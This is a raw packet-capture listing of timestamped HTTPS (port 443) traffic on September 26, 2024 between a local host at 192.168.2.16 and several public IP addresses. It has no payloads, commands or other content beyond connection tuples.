Sep 26, 2024 17:55:26.931723118 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931761980 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931824923 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.931835890 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931878090 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931879997 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.931886911 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931921959 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.931931973 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932224989 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932261944 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932295084 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932310104 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.932324886 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932343960 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.932363033 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932714939 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932754993 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932791948 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932799101 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.932835102 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932862997 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.932882071 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932918072 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.932944059 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.932966948 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933008909 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.933269978 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933367014 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933407068 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933434010 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.933437109 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933446884 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933449984 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.933479071 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.933705091 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933775902 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933809996 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933831930 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.933837891 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.933885098 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.933893919 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.934251070 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.934289932 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.934324980 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.934348106 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.934355974 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.934384108 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.934390068 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.934418917 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.934448004 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.934474945 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.934483051 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.934509039 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.961020947 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.961096048 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.961174965 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.961302996 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.961322069 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.961355925 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.962806940 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.962811947 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.966073990 CEST	443	49724	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.966264963 CEST	443	49724	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.966351032 CEST	49724	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:26.967158079 CEST	49724	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:26.967175961 CEST	443	49724	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.968084097 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.968112946 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.968139887 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.968168974 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.968173027 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.968182087 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.968223095 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.968246937 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.970544100 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.970613956 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.970745087 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.970782042 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.970788956 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.970796108 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.970926046 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.970931053 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.970997095 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.971065998 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.975066900 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.975105047 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.975219011 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.975219011 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.975229025 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.020294905 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.020313978 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.020395041 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.020410061 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.021763086 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.021775961 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.021842003 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.021848917 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.023163080 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.023184061 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.023241043 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.023248911 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.023770094 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.023802996 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.023832083 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.023838997 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.023894072 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.024099112 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.024127007 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.024184942 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.028455973 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.028491020 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.028590918 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.028938055 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.028949976 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.039411068 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.039474964 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.041553020 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.041887045 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.041913033 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.061935902 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.062227011 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.062241077 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.062525034 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.062844038 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.062900066 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.062988043 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.064415932 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.064707994 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.064717054 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.065612078 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.065701962 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.066082954 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.066143990 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.066411018 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.066418886 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.067477942 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.067698002 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.067711115 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.069118977 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.069180965 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.069454908 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.069518089 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.069578886 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.069583893 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.086086988 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.086152077 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.086196899 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.086222887 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.086239100 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.086721897 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.086767912 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.086783886 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.086790085 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.086807013 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.095302105 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.095463037 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.095469952 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.104610920 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.104801893 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.104824066 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.107405901 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.109153032 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.109236002 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.109268904 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.109272957 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.109302044 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.109301090 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.109327078 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.109354973 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.109977007 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.110033035 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.110049009 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.113995075 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.115462065 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.115472078 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.116792917 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.116853952 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.116861105 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.124197006 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.124798059 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.124897003 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.124903917 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.132344007 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.133721113 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.133733988 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.144041061 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.144088984 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.144120932 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.144196987 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.144229889 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.151586056 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.152224064 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.152282000 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.159287930 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.160979986 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.161003113 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.167594910 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.167640924 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.167661905 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.167681932 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.168236971 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.174173117 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.174280882 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.174979925 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.175050020 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.177355051 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.177455902 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.177496910 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.177520037 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.177540064 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.179445028 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.186501026 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.195303917 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.195365906 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.195467949 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.195492029 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.196201086 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.197911978 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.199378014 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.199480057 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.199589968 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.199620008 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.199662924 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.204181910 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.207227945 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.211853981 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.212001085 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.212059975 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.212083101 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.214721918 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.214755058 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.214792013 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.215293884 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.215311050 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.215430975 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.218797922 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.222824097 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.226241112 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.226310015 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.226320028 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.226341009 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.226387024 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.230292082 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.230300903 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.230371952 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.230380058 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.230400085 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.231308937 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.231373072 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.231534004 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.234183073 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.234272957 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.236757994 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.236846924 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.236922026 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.236931086 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.237965107 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.238009930 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.238013983 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.238050938 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.238074064 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.238894939 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.241708994 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.241776943 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.241801977 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.241832972 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.241890907 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.242881060 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.244375944 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.268233061 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.268565893 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.268567085 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.268606901 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.268620014 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.268629074 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.268640041 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.268652916 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.268662930 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.268706083 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.268711090 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.269207954 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.269268036 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.269324064 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.269375086 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.269412994 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.269417048 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.269440889 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.269488096 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.269490957 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.269507885 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.269546032 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.270647049 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.270780087 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.270880938 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.270910025 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.270919085 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.270962000 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.271039963 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.271039963 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.271068096 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.271083117 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.271083117 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.271095991 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.271104097 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.271114111 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.271127939 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.271158934 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.271189928 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.271199942 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.271842957 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.271920919 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.271953106 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.271959066 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.271965027 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.272010088 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.272017956 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.272073030 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.272121906 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.272126913 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.272135973 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.272197962 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.272458076 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.272938013 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.273420095 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.276199102 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.276240110 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.276252031 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.276261091 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.276289940 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.279696941 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.279778957 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.279846907 CEST	49729	443	192.168.2.16	142.250.184.206
